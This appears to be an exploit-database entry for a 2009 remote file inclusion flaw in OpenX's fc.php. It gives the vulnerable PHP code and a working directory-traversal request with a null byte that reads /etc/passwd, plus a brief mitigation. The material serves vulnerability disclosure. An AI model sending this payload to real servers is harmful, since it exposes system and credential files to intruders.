header-logo
Suggest Exploit
vendor:
OpenX
by:
Charlie Briggs
7.5
CVSS
HIGH
Remote File Inclusion
22
CWE
Product Name: OpenX
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

OpenX Remote File Inclusion Vulnerability

OpenX is vulnerable to a remote file inclusion vulnerability due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by appending a null byte to the end of a string and using directory traversal in the GET parameter MAX_type, like so: /www/delivery/fc.php?MAX_type=../../../../../../../../../../../../../../../etc/passwd%00, which will allow the attacker to view the /etc/passwd file.

Mitigation:

Sanitize user-supplied input to prevent directory traversal attacks.
Source

Exploit-DB raw data:

<snip>
include_once '../../init-delivery.php';
$MAX_PLUGINS_AD_PLUGIN_NAME = 'MAX_type';
if(!isset($_GET[$MAX_PLUGINS_AD_PLUGIN_NAME])) {
echo $MAX_PLUGINS_AD_PLUGIN_NAME . ' is not specified';
exit(1);
}
$tagName = $_GET[$MAX_PLUGINS_AD_PLUGIN_NAME];
$tagFileName = MAX_PATH . '/plugins/invocationTags/'.$tagName.'/'.$tagName.'.delivery.php';
if(!file_exists($tagFileName)) {
echo 'Invocation plugin delivery file "' . $tagFileName . '" doesn\'t exists';
exit(1);
}
include $tagFileName;
</snip>

If a null byte is appended to the end of a string, and directory traversal is used in the GET parameter MAX_type, 
like so: /www/delivery/fc.php?MAX_type= ../../../../../../../../../../../../../../../etc/passwd%00, you will see 
the /etc/passwd file before you ;)

-Charlie Briggs [Elites0ft.com]

# milw0rm.com [2009-01-26]